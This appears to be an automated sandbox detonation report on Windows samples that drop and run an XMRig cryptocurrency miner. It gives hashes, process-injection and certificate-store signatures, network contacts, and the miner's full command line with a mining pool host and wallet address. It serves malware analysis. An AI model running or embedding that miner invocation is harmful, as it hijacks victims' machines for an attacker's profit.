| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3916 wrote to memory of 3232 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3916 wrote to memory of 3232 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3232-16-0x000001B7898F0000-0x000001B789910000-memory.dmp
memory/3232-17-0x000001B78B1F0000-0x000001B78B210000-memory.dmp
memory/3232-18-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-19-0x000001B78B210000-0x000001B78B230000-memory.dmp
memory/3232-20-0x000001B78B230000-0x000001B78B250000-memory.dmp
memory/3232-21-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-22-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-25-0x000001B78B230000-0x000001B78B250000-memory.dmp
memory/3232-24-0x000001B78B210000-0x000001B78B230000-memory.dmp
memory/3232-23-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-26-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-27-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-28-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-29-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-30-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-31-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-32-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-33-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-34-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-35-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-36-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-37-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-38-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-39-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-40-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-41-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-42-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-43-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-44-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-45-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-46-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-47-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-48-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-49-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-50-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-51-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-52-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-53-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-54-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-55-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-56-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-57-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-58-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-59-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-60-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-61-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-62-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-63-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-64-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-65-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-66-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-67-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-68-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-69-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-70-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-71-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-72-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-73-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-74-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-75-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-76-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-77-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-78-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-79-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-80-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-81-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-82-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-83-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-84-0x00007FF783E70000-0x00007FF784973000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:04
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1936 wrote to memory of 3708 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1936 wrote to memory of 3708 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3708-16-0x00000299544F0000-0x0000029954510000-memory.dmp
memory/3708-17-0x0000029954640000-0x0000029954660000-memory.dmp
memory/3708-18-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-20-0x0000029954660000-0x0000029954680000-memory.dmp
memory/3708-19-0x0000029954680000-0x00000299546A0000-memory.dmp
memory/3708-21-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-22-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-25-0x0000029954660000-0x0000029954680000-memory.dmp
memory/3708-24-0x0000029954680000-0x00000299546A0000-memory.dmp
memory/3708-23-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-26-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-27-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-28-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-29-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-30-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-31-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-32-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-33-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-34-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-35-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-36-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-37-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-38-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-39-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-40-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-41-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-42-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-43-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-44-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-45-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-46-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-47-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-48-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-49-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-50-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-51-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-52-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-53-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-54-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-55-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-56-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-57-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-58-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-59-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-60-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-61-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-62-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-63-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-64-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-65-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-66-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-67-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-68-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-69-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-70-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-71-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-72-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-73-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-74-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-75-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-76-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-77-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-78-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-79-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-80-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-81-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-82-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-83-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-84-0x00007FF715590000-0x00007FF716093000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:05
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
